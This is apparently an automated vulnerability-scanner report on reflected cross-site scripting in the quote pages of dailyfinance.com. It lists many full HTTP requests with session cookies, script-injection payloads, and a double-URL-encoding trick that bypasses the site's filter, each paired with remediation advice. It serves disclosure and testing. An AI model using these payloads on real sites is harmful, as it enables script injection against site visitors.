There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/ftse-100/ukx88bb9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4d1584cb86f/ise HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a74e'%3bec5d25dbfd4 was submitted in the REST URL parameter 3. This input was echoed as 4a74e';ec5d25dbfd4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/ftse-100/ukx4a74e'%3bec5d25dbfd4/ise HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24751'%3ba6e23bb58b5 was submitted in the REST URL parameter 3. This input was echoed as 24751';a6e23bb58b5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/gmx-resources-inc/gmxr24751'%3ba6e23bb58b5/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d11b2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb9e9b53851d was submitted in the REST URL parameter 3. This input was echoed as d11b2"><script>alert(1)</script>b9e9b53851d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/gmx-resources-inc/gmxrd11b2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb9e9b53851d/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e993b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaad299d9b26 was submitted in the REST URL parameter 3. This input was echoed as e993b"><script>alert(1)</script>aad299d9b26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/gold-futures-apr-2011-composite/e993b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaad299d9b26/cmx HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1b70'%3bf67d1ecf86a was submitted in the REST URL parameter 3. This input was echoed as b1b70';f67d1ecf86a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/gold-futures-apr-2011-composite/b1b70'%3bf67d1ecf86a/cmx HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd55e'%3bc3e98ec0ddd was submitted in the REST URL parameter 3. This input was echoed as fd55e';c3e98ec0ddd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/hang-seng-index/hsixfd55e'%3bc3e98ec0ddd/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29784%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8b45c640a2 was submitted in the REST URL parameter 3. This input was echoed as 29784"><script>alert(1)</script>a8b45c640a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/hang-seng-index/hsix29784%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8b45c640a2/fx1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55344'%3b001ff1ae24f was submitted in the REST URL parameter 3. This input was echoed as 55344';001ff1ae24f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/henry-hub-natural-gas-futures-apr-2011-composite/55344'%3b001ff1ae24f/nym HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9f84%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead7d01a22cc was submitted in the REST URL parameter 3. This input was echoed as a9f84"><script>alert(1)</script>ad7d01a22cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/henry-hub-natural-gas-futures-apr-2011-composite/a9f84%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead7d01a22cc/nym HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2c36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97d1cfe87dc was submitted in the REST URL parameter 3. This input was echoed as c2c36"><script>alert(1)</script>97d1cfe87dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/k-v-pharmaceutical-company/kv.ac2c36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97d1cfe87dc/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f624'%3b2f6c02140e5 was submitted in the REST URL parameter 3. This input was echoed as 4f624';2f6c02140e5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/k-v-pharmaceutical-company/kv.a4f624'%3b2f6c02140e5/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cf05'%3b2c42d79a6ba was submitted in the REST URL parameter 3. This input was echoed as 6cf05';2c42d79a6ba in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/kv-pharmaceutical-co-cl-b/kv.b6cf05'%3b2c42d79a6ba/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab69f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11cb2168c6d was submitted in the REST URL parameter 3. This input was echoed as ab69f"><script>alert(1)</script>11cb2168c6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/kv-pharmaceutical-co-cl-b/kv.bab69f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11cb2168c6d/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c0ef%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec449bdccd8b was submitted in the REST URL parameter 3. This input was echoed as 2c0ef"><script>alert(1)</script>c449bdccd8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/las-vegas-sands-corp/lvs2c0ef%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec449bdccd8b/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a374'%3b7b4e9da9db2 was submitted in the REST URL parameter 3. This input was echoed as 8a374';7b4e9da9db2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/las-vegas-sands-corp/lvs8a374'%3b7b4e9da9db2/nys HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a448'%3b4d2bab4fea9 was submitted in the REST URL parameter 3. This input was echoed as 8a448';4d2bab4fea9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/light-sweet-crude-oil-futures-mar-2011-composite/8a448'%3b4d2bab4fea9/nym HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec755e3ffde6 was submitted in the REST URL parameter 3. This input was echoed as 62a5d"><script>alert(1)</script>c755e3ffde6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/light-sweet-crude-oil-futures-mar-2011-composite/62a5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec755e3ffde6/nym HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54f7c'%3be9a331d34e1 was submitted in the REST URL parameter 3. This input was echoed as 54f7c';e9a331d34e1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/nasdaq-composite/$compx54f7c'%3be9a331d34e1/nai HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60751%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2fd436ea4f0 was submitted in the REST URL parameter 3. This input was echoed as 60751"><script>alert(1)</script>2fd436ea4f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/nasdaq-composite/$compx60751%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2fd436ea4f0/nai HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fbf2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f3cf8f4bfb was submitted in the REST URL parameter 3. This input was echoed as 6fbf2"><script>alert(1)</script>4f3cf8f4bfb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
